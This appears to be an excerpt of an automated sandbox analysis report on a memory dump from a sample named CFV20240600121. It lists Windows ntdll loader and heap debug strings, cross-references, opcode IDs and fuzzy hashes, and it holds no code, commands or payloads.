                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                        • API String ID: 0-1239276146
                                        Strings
                                        • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01443456
                                        • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0144342A
                                        • RtlDeactivateActivationContext, xrefs: 01443425, 01443432, 01443451
                                        • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01443437
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                        • API String ID: 0-1245972979
                                        Strings
                                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01430FE5
                                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 014310AE
                                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0143106B
                                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01431028
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                        • API String ID: 0-1468400865
                                        Strings
                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0143A992
                                        • apphelp.dll, xrefs: 013F2462
                                        • LdrpDynamicShimModule, xrefs: 0143A998
                                        • minkernel\ntdll\ldrinit.c, xrefs: 0143A9A2
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                        • API String ID: 0-176724104
                                        Strings
                                        • HEAP[%wZ]: , xrefs: 013E3255
                                        • HEAP: , xrefs: 013E3264
                                        • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 013E327D
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                        • API String ID: 0-617086771
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                        • API String ID: 0-4253913091
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $@
                                        • API String ID: 0-1077428164
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: FilterFullPath$UseFilter$\??\
                                        • API String ID: 0-2779062949
                                        Strings
                                        • LdrpCheckModule, xrefs: 0143A117
                                        • Failed to allocated memory for shimmed module list, xrefs: 0143A10F
                                        • minkernel\ntdll\ldrinit.c, xrefs: 0143A121
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                        • API String ID: 0-161242083
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                        • API String ID: 0-1334570610
                                        Strings
                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 014482DE
                                        • minkernel\ntdll\ldrinit.c, xrefs: 014482E8
                                        • Failed to reallocate the system dirs string !, xrefs: 014482D7
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                        • API String ID: 0-1783798831
                                        Strings
                                        • PreferredUILanguages, xrefs: 0148C212
                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0148C1C5
                                        • @, xrefs: 0148C1F1
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                        • API String ID: 0-2968386058
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                        • API String ID: 0-1373925480
                                        Strings
                                        • LdrpCheckRedirection, xrefs: 0145488F
                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01454888
                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01454899
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                        • API String ID: 0-3154609507
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                        • API String ID: 0-2558761708
                                        Strings
                                        • LdrpInitializationFailure, xrefs: 014520FA
                                        • Process initialization failed with status 0x%08lx, xrefs: 014520F3
                                        • minkernel\ntdll\ldrinit.c, xrefs: 01452104
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                        • API String ID: 0-2986994758
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: ___swprintf_l
                                        • String ID: #%u
                                        • API String ID: 48624451-232158463
                                        Strings
                                        • LdrResSearchResource Exit, xrefs: 013DAA25
                                        • LdrResSearchResource Enter, xrefs: 013DAA13
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                        • API String ID: 0-4066393604
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: `$`
                                        • API String ID: 0-197956300
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID: Legacy$UEFI
                                        • API String ID: 2994545307-634100481
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @$MUI
                                        • API String ID: 0-17815947
                                        Strings
                                        • kLsE, xrefs: 013D0540
                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 013D063D
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                        • API String ID: 0-2547482624
                                        Strings
                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 013DA2FB
                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 013DA309
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                        • API String ID: 0-2876891731
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID: Cleanup Group$Threadpool!
                                        • API String ID: 2994545307-4008356553
                                        Similarity
                                        • API ID:
                                        • String ID: MUI
                                        • API String ID: 0-1339004836
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        Similarity
                                        • API ID:
                                        • String ID: GlobalTags
                                        • API String ID: 0-1106856819
                                        Similarity
                                        • API ID:
                                        • String ID: .mui
                                        • API String ID: 0-1199573805
                                        Similarity
                                        • API ID:
                                        • String ID: EXT-
                                        • API String ID: 0-1948896318
                                        Similarity
                                        • API ID:
                                        • String ID: BinaryHash
                                        • API String ID: 0-2202222882
                                        Similarity
                                        • API ID:
                                        • String ID: #
                                        • API String ID: 0-1885708031
                                        Similarity
                                        • API ID:
                                        • String ID: BinaryName
                                        • API String ID: 0-215506332
                                        Strings
                                        • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0145895E
                                        Similarity
                                        • API ID:
                                        • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                        • API String ID: 0-702105204
                                        • Opcode ID: a693b9cac7aa04ca0d7d8f89759a31ca1093e6039352fe0688bf9c4bc2e9bbfc
                                        • Instruction ID: 29f403bf934c63c856dc08d50d8eb5e286871229012846be12c971fe63d2eb44
                                        • Opcode Fuzzy Hash: a693b9cac7aa04ca0d7d8f89759a31ca1093e6039352fe0688bf9c4bc2e9bbfc
                                        • Instruction Fuzzy Hash: 670188363002129FE7A55B5BDC84A6A7FB5EF95654B04042EEA4116673CF306841CB96
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6d381244fa4e73039155facc40a06b328ceb902c3ed14a8a116b69382b484bed
                                        • Instruction ID: ed5ac06163e96e9ee814e454cd6d0642fc1613fa557443bb557a99c31d054df0
                                        • Opcode Fuzzy Hash: 6d381244fa4e73039155facc40a06b328ceb902c3ed14a8a116b69382b484bed
                                        • Instruction Fuzzy Hash: 5942D1316083419BD725CF69C890EABBBE5BF98304F09092FFA8697360D7B1D945CB52
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: af89098b95a7fd99f51ee81a424ded303f54008f5e05309e85aff0152ffc01c7
                                        • Instruction ID: a1f725893868273f59702633048eddeeaee0f9a545b47188422bf9b512d41b0f
                                        • Opcode Fuzzy Hash: af89098b95a7fd99f51ee81a424ded303f54008f5e05309e85aff0152ffc01c7
                                        • Instruction Fuzzy Hash: 0A423D75A0031A8FEB24CF69C841BAEBBF9BF48304F14819AE949AB251D7349D85CF51
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4ca942f7b09bdfbb550ae93b322aa5e9745ce6b9f01d30514f37c5fa5544c72d
                                        • Instruction ID: cea48a30e3f05f2f3d51f5618b7d7f24b3c2dd22a1a766028ce5e2f78f3b3a12
                                        • Opcode Fuzzy Hash: 4ca942f7b09bdfbb550ae93b322aa5e9745ce6b9f01d30514f37c5fa5544c72d
                                        • Instruction Fuzzy Hash: 3332E270A00756AFDB25CF69C8447BEBBF6BF88304F25412ED54A9B3A4D735A902CB50
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 68902b2e8babb8efe5300657a219f235f16d73d491f5dcbac566421b73f27773
                                        • Instruction ID: abb97485367c778edfa0917b2a4674aaf0e62a42c41cfc00a626c8c13bdfa3ad
                                        • Opcode Fuzzy Hash: 68902b2e8babb8efe5300657a219f235f16d73d491f5dcbac566421b73f27773
                                        • Instruction Fuzzy Hash: DA22B0702046618BEB25CF2DC0947BABBF1AF44304F2C845BE9868F3A6D775E452CB61
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4e8af847e05ee4867e658f7fbc0ac15aa0831e9e1ce5983af76f989902125cb6
                                        • Instruction ID: dec1dcf5b890ddba0dbbe4a48634e68f1e6996e22150a786b3b1207d65dcaf32
                                        • Opcode Fuzzy Hash: 4e8af847e05ee4867e658f7fbc0ac15aa0831e9e1ce5983af76f989902125cb6
                                        • Instruction Fuzzy Hash: B132C0B1A00205CFDB25CF69D480BAEB7F5FF98304F14856AE966AB7A1D734E841CB50
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                        • Instruction ID: ad718c5bea3ab8799d227b79635eba62b0668e3e3da51759e0baeda157d5160f
                                        • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                        • Instruction Fuzzy Hash: 3CF13B71E0021A9BDF15CF99D580BAFBBF5AF48718F08812EEA45AB351E774D841CB60
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 91acaf92de3572696e591e8657a4ae6291ef86371e78011319bff8dad64cbabd
                                        • Instruction ID: 3a93d945da2f7131a4c56b951905f07172f5b0a49465dd6615407746e902a2d5
                                        • Opcode Fuzzy Hash: 91acaf92de3572696e591e8657a4ae6291ef86371e78011319bff8dad64cbabd
                                        • Instruction Fuzzy Hash: C5D11171A0070B8BDF05CF69C840AFFB7F9AF88308F18816AD955A7251E735E906CB61
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0bdf70f276ea6619fd57e14dadb04dd368a6d4659306df147d2b5e7cb0697f55
                                        • Instruction ID: 19f5060f0e1fe7d4debda78987a46df79acab9865334696c43266a7475c7b148
                                        • Opcode Fuzzy Hash: 0bdf70f276ea6619fd57e14dadb04dd368a6d4659306df147d2b5e7cb0697f55
                                        • Instruction Fuzzy Hash: 80E1B0B2508346CFC715CF28D490A6ABBE0FF88318F05896DF9A587351DB31E905CB92
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7d36ee3b6c93a71731411511fb7ed8e945438556613fdceec330bd208cf7c27a
                                        • Instruction ID: fec576cf09ce1a5fddf635e24d411b11e1aa1aa4e23b6b0a44fbe84838f6dc09
                                        • Opcode Fuzzy Hash: 7d36ee3b6c93a71731411511fb7ed8e945438556613fdceec330bd208cf7c27a
                                        • Instruction Fuzzy Hash: EAD1F571A0021ADBDB14DF29C880ABBBBA5FF54B18F04456EE915DB290F734EE91CB50
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                        • Instruction ID: 2a6b85de1b568a34fcb49162eec193dc4e04ed9b70d4064de06363497abe30e0
                                        • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                        • Instruction Fuzzy Hash: 33B1A674A00606AFDB64DF56C940EABBFB5FF54344F10442EAE41977A2DE30E906CB10
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                        • Instruction ID: 91cc87dae1b65d8daf7f1516b36b0108610b4e9d37fb3f3d5b69112109e71a39
                                        • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                        • Instruction Fuzzy Hash: 87B1443170475A9FDB15DBA8C854BBFBBFAAF88204F28015AE1529B3D1D770E941CB90
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ff7927de9101e5103713112a51cbf2eda115cf7ccccdea2fcea250b63c89a3c7
                                        • Instruction ID: 1a297072bd00296750c3813f81519fc83a026571854281a817e66020abccc1c7
                                        • Opcode Fuzzy Hash: ff7927de9101e5103713112a51cbf2eda115cf7ccccdea2fcea250b63c89a3c7
                                        • Instruction Fuzzy Hash: 44C15675108341CFE764CF19C484BABBBE5BF98708F44496EE989873A1D774E908CB92
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f3d0f11ec4f60f0ac17a90ed3d63a067e06b649533288b96dfa180489d1d1790
                                        • Instruction ID: a38f95a99e2443f3c31b10bc25c9e8459b535934f5d84f788900c51c7f145666
                                        • Opcode Fuzzy Hash: f3d0f11ec4f60f0ac17a90ed3d63a067e06b649533288b96dfa180489d1d1790
                                        • Instruction Fuzzy Hash: C3B19270A002668BDB24CF69C890BA9B3B5EF54714F1485EED50EE7651EB34DDC5CB20
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 971b3b478a4a20798d1bd4792f59ef7d099f98872e7a41ba07fede187e0304e0
                                        • Instruction ID: 101b5af0980fc9798ffa5cbf4446851607b62318020347acdae68a6c6fd97c96
                                        • Opcode Fuzzy Hash: 971b3b478a4a20798d1bd4792f59ef7d099f98872e7a41ba07fede187e0304e0
                                        • Instruction Fuzzy Hash: ACA10731E006599FEB21DB5CC844FAEBBA4BB44718F16013AEB10AB2B1D7749D45CB92
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4674d3292567313c92646e5d6da1a6cbd019b299455bf597246ae4f0a0bfc553
                                        • Instruction ID: 4f2d1201004ea77a5eb7027a56e324a8f49960bc25ec1589969306a730f4746e
                                        • Opcode Fuzzy Hash: 4674d3292567313c92646e5d6da1a6cbd019b299455bf597246ae4f0a0bfc553
                                        • Instruction Fuzzy Hash: 3AA1C170B0061A9FEB25CF69C590BABB7B1FF54314F04402BEA45973A9DB34E852CB50
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7810c8f649064fce25333fb3cd81a1392c2ccf1cda18344cdd399fdd13f8d6b7
                                        • Instruction ID: 028c0aff678ae3843fa35df42d19f5273a513a85811aae3744ff10fad3bea018
                                        • Opcode Fuzzy Hash: 7810c8f649064fce25333fb3cd81a1392c2ccf1cda18344cdd399fdd13f8d6b7
                                        • Instruction Fuzzy Hash: 9A413732901206CFDB24CF5CE9A0A6ABBB5FF94708F18806ED5019B765C375E842CF90
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 74174cc32b6d942c6aa7294d1e5cd7204558a5954933231bafcd52c4a92d34b4
                                        • Instruction ID: a4f87e713fe036d735546b65a9b7aae998b198abbb06193759c3cc8391336b3a
                                        • Opcode Fuzzy Hash: 74174cc32b6d942c6aa7294d1e5cd7204558a5954933231bafcd52c4a92d34b4
                                        • Instruction Fuzzy Hash: 764162315083169ED312DF69C840AABB7E9EF84B58F40096FF985D7260E730DE448BA3
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                        • Instruction ID: f580dfa8a25277d035c3ad231066cf740da91848fd11ab8b3fb9bc6d799b13a2
                                        • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
